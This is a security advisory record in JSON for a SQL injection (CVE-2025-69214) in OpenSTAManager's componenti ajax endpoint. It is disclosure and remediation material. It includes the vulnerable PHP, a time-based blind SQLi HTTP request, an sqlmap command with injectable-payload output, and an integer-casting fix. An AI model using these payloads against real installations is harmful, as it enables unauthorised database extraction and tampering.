{"id":"GHSA-qjv8-63xq-gq8m","summary":"OpenSTAManager has a SQL Injection in ajax_select.php (componenti endpoint)","details":"## Summary\nA SQL Injection vulnerability exists in the `ajax_select.php` endpoint when handling the `componenti` operation. An authenticated attacker can inject malicious SQL code through the `options[matricola]` parameter.\n\n## Proof of Concept\n\n### Vulnerable Code\n**File:** `modules/impianti/ajax/select.php:122-124`\n\n```php\ncase 'componenti':\n    $impianti = $superselect['matricola'];\n    if (!empty($impianti)) {\n        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';\n    }\n```\n\n### Data Flow\n1. **Source:** `$_GET['options']['matricola']` → `$superselect['matricola']`\n2. **Vulnerable:** User input concatenated directly into `IN()` clause without sanitization\n3. **Sink:** Query executed via AJAX framework\n\n### Exploit\n\n**Manual PoC (Time-based Blind SQLi):**\n```http\nGET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1\nHost: localhost:8081\nCookie: PHPSESSID=\u003cvalid-session\u003e\n```\n\u003cimg width=\"1306\" height=\"581\" alt=\"image\" src=\"https://github.com/user-attachments/assets/238015dd-5644-4eed-ae8f-864dc0073011\" /\u003e\n\n**SQLMap Exploitation:**\n```bash\nsqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \\\n  --cookie=\"PHPSESSID=\u003csession\u003e\" \\\n  --dbms=MySQL \\\n  --technique=T \\\n  --level=3 \\\n  --risk=3\n```\n\n**SQLMap Output:**\n```\n[INFO] URI parameter '#1*' appears to be 'MySQL \u003e= 5.0.12 AND time-based blind (query SLEEP)' injectable\nParameter: #1* (URI)\n    Type: time-based blind\n    Title: MySQL \u003e= 5.0.12 AND time-based blind (query SLEEP)\n    Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI\nback-end DBMS: MySQL \u003e= 5.0.12\n```\n\u003cimg width=\"1228\" height=\"801\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b0b7078b-09a7-4e53-956c-baf1d09ed59b\" /\u003e\n\n## Impact\n- **Data Exfiltration:** Time-based blind SQL Injection allows complete database extraction\n- **Authentication Bypass:** Access to sensitive component and equipment data\n- **Data Manipulation:** Potential unauthorized modification of records\n\n## Remediation\n\nCast values to integers before using in SQL:\n\n**Before:**\n```php\n$impianti = $superselect['matricola'];\nif (!empty($impianti)) {\n    $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';\n}\n```\n\n**After:**\n```php\n$impianti = $superselect['matricola'];\nif (!empty($impianti)) {\n    $ids = array_map('intval', explode(',', $impianti));\n    $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';\n}\n```\n\n## Credit\nDiscovered by: Łukasz Rybak","aliases":["CVE-2025-69214"],"modified":"2026-02-10T01:34:46.742101Z","published":"2026-02-06T18:04:32Z","database_specific":{"nvd_published_at":"2026-02-06T19:16:07Z","cwe_ids":["CWE-89"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-02-06T18:04:32Z"},"references":[{"type":"WEB","url":"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69214"},{"type":"PACKAGE","url":"https://github.com/devcode-it/openstamanager"}],"affected":[{"package":{"name":"devcode-it/openstamanager","ecosystem":"Packagist","purl":"pkg:composer/devcode-it/openstamanager"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"last_affected":"2.9.8"}]}],"versions":["2.3.0","v2.4","v2.4.1","v2.4.10","v2.4.11","v2.4.12","v2.4.13","v2.4.14","v2.4.15","v2.4.16","v2.4.17","v2.4.17.1","v2.4.18","v2.4.19","v2.4.2","v2.4.20","v2.4.21","v2.4.22","v2.4.23","v2.4.24","v2.4.25","v2.4.26","v2.4.27","v2.4.28","v2.4.29","v2.4.3","v2.4.30","v2.4.31","v2.4.32","v2.4.33","v2.4.34","v2.4.35","v2.4.36","v2.4.37","v2.4.38","v2.4.39","v2.4.4","v2.4.40","v2.4.41","v2.4.42","v2.4.43","v2.4.44","v2.4.45","v2.4.46","v2.4.47","v2.4.48","v2.4.49","v2.4.5","v2.4.50","v2.4.51","v2.4.52","v2.4.53","v2.4.54","v2.4.6","v2.4.7","v2.4.8","v2.4.9","v2.5","v2.5.1-beta","v2.5.2-beta","v2.5.3","v2.5.4","v2.5.5","v2.5.6","v2.5.7","v2.6-beta","v2.6.1","v2.6.2","v2.7","v2.7-beta","v2.7.1","v2.7.2","v2.7.3","v2.8-beta","v2.8.1","v2.8.2","v2.8.3","v2.9","v2.9-beta","v2.9.1","v2.9.2","v2.9.3","v2.9.4","v2.9.5","v2.9.6","v2.9.7","v2.9.8"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-qjv8-63xq-gq8m/GHSA-qjv8-63xq-gq8m.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"}]}